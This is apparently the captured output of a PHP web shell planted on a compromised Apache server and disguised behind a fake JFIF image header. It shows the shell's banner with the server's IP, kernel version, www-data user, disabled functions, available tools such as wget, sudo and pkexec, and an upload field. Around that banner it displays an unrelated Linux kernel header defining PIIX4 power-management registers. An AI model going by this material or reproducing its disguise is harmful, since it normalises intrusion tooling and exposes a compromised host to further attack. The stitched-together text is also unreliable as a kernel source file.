????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.140.198.85 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /usr/src/linux-headers-3.13.0-49/arch/x86/include/asm/visws/ |
Upload File : |
#ifndef _ASM_X86_VISWS_PIIX4_H #define _ASM_X86_VISWS_PIIX4_H /* * PIIX4 as used on SGI Visual Workstations */ #define PIIX_PM_START 0x0F80 #define SIO_GPIO_START 0x0FC0 #define SIO_PM_START 0x0FC8 #define PMBASE PIIX_PM_START #define GPIREG0 (PMBASE+0x30) #define GPIREG(x) (GPIREG0+((x)/8)) #define GPIBIT(x) (1 << ((x)%8)) #define PIIX_GPI_BD_ID1 18 #define PIIX_GPI_BD_ID2 19 #define PIIX_GPI_BD_ID3 20 #define PIIX_GPI_BD_ID4 21 #define PIIX_GPI_BD_REG GPIREG(PIIX_GPI_BD_ID1) #define PIIX_GPI_BD_MASK (GPIBIT(PIIX_GPI_BD_ID1) | \ GPIBIT(PIIX_GPI_BD_ID2) | \ GPIBIT(PIIX_GPI_BD_ID3) | \ GPIBIT(PIIX_GPI_BD_ID4) ) #define PIIX_GPI_BD_SHIFT (PIIX_GPI_BD_ID1 % 8) #define SIO_INDEX 0x2e #define SIO_DATA 0x2f #define SIO_DEV_SEL 0x7 #define SIO_DEV_ENB 0x30 #define SIO_DEV_MSB 0x60 #define SIO_DEV_LSB 0x61 #define SIO_GP_DEV 0x7 #define SIO_GP_BASE SIO_GPIO_START #define SIO_GP_MSB (SIO_GP_BASE>>8) #define SIO_GP_LSB (SIO_GP_BASE&0xff) #define SIO_GP_DATA1 (SIO_GP_BASE+0) #define SIO_PM_DEV 0x8 #define SIO_PM_BASE SIO_PM_START #define SIO_PM_MSB (SIO_PM_BASE>>8) #define SIO_PM_LSB (SIO_PM_BASE&0xff) #define SIO_PM_INDEX (SIO_PM_BASE+0) #define SIO_PM_DATA (SIO_PM_BASE+1) #define SIO_PM_FER2 0x1 #define SIO_PM_GP_EN 0x80 /* * This is the dev/reg where generating a config cycle will * result in a PCI special cycle. */ #define SPECIAL_DEV 0xff #define SPECIAL_REG 0x00 /* * PIIX4 needs to see a special cycle with the following data * to be convinced the processor has gone into the stop grant * state. PIIX4 insists on seeing this before it will power * down a system. */ #define PIIX_SPECIAL_STOP 0x00120002 #define PIIX4_RESET_PORT 0xcf9 #define PIIX4_RESET_VAL 0x6 #define PMSTS_PORT 0xf80 // 2 bytes PM Status #define PMEN_PORT 0xf82 // 2 bytes PM Enable #define PMCNTRL_PORT 0xf84 // 2 bytes PM Control #define PM_SUSPEND_ENABLE 0x2000 // start sequence to suspend state /* * PMSTS and PMEN I/O bit definitions. * (Bits are the same in both registers) */ #define PM_STS_RSM (1<<15) // Resume Status #define PM_STS_PWRBTNOR (1<<11) // Power Button Override #define PM_STS_RTC (1<<10) // RTC status #define PM_STS_PWRBTN (1<<8) // Power Button Pressed? #define PM_STS_GBL (1<<5) // Global Status #define PM_STS_BM (1<<4) // Bus Master Status #define PM_STS_TMROF (1<<0) // Timer Overflow Status. /* * Stop clock GPI register */ #define PIIX_GPIREG0 (0xf80 + 0x30) /* * Stop clock GPI bit in GPIREG0 */ #define PIIX_GPI_STPCLK 0x4 // STPCLK signal routed back in #endif /* _ASM_X86_VISWS_PIIX4_H */